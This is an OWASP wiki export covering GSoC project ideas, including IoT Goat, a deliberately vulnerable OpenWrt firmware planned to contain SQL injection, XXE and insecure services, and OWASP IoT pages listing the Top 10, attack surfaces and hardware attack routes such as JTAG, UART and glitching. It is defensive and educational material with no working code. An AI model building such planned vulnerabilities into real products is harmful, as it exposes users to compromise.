: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* Detect login and registration pages<br />
:* Provide a wizard to walk users through the process of setting up authentication, with as much assistance as possible<br />
:* An option to completely automate the authentication process, for as many authentication mechanisms as possible<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
:<br />
<br />
== IoT Goat ==<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf IoT Top 10 2018]. <br />
<br />
===Insecure web services/application===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* Web services deployed in OpenWRT containing critical vulnerabilities showcasing the traditional IoT problems. It must contain the following vulnerabilities to be used with the IoT testing guide: SQL injection, local inclusion and XXE injection (I1), Insufficient Authentication (I2), transfer sensitive information using insecure channels (I4).<br />
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Web security<br />
* Embedded Security<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
===Insecure services===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* Create/Install/Document network services with security vulnerabilities and insecure configurations that can be abused during the challenges.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Network security<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
===Insecure web services/application===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* Web services deployed in OpenWRT containing critical vulnerabilities showcasing the traditional IoT problems. It must contain the following vulnerabilities to be used with the IoT testing guide: SQL injection, local inclusion and XXE injection (I1), Insufficient Authentication (I2), transfer sensitive information using insecure channels (I4).<br />
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Web security<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
===Insecure Android/iOS application===<br />
''' Getting started '''<br />
* [https://github.com/scriptingxss/IoTGoat/blob/master/README.md Get familiar with OpenWrt]<br />
<br />
'''Expected Results:'''<br />
* .Android application containing client and server side vulnerabilities covering the OWASP TOP 10 Mobile Risks.<br />
* iOS application containing client and server side vulnerabilities covering the OWASP TOP 10 Mobile Risks.<br />
* Web Services deployed as a service in OpenWrt to be used by the Android/iOS clients.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* OpenWRT<br />
* Mobile security knowledge.<br />
* Mobile/Web development knowledge.<br />
<br />
'''Potential Mentors:'''<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:OWASP-IoT-Top-10-2018-final.pdf&diff=246272File:OWASP-IoT-Top-10-2018-final.pdf2018-12-26T04:33:42Z<p>Aaron.guzman: Aaron.guzman uploaded a new version of File:OWASP-IoT-Top-10-2018-final.pdf</p>
<hr />
<div>IoT Top 10 2018</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246271OWASP Internet of Things Project2018-12-26T04:30:10Z<p>Aaron.guzman: /* OWASP Internet of Things (IoT) Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
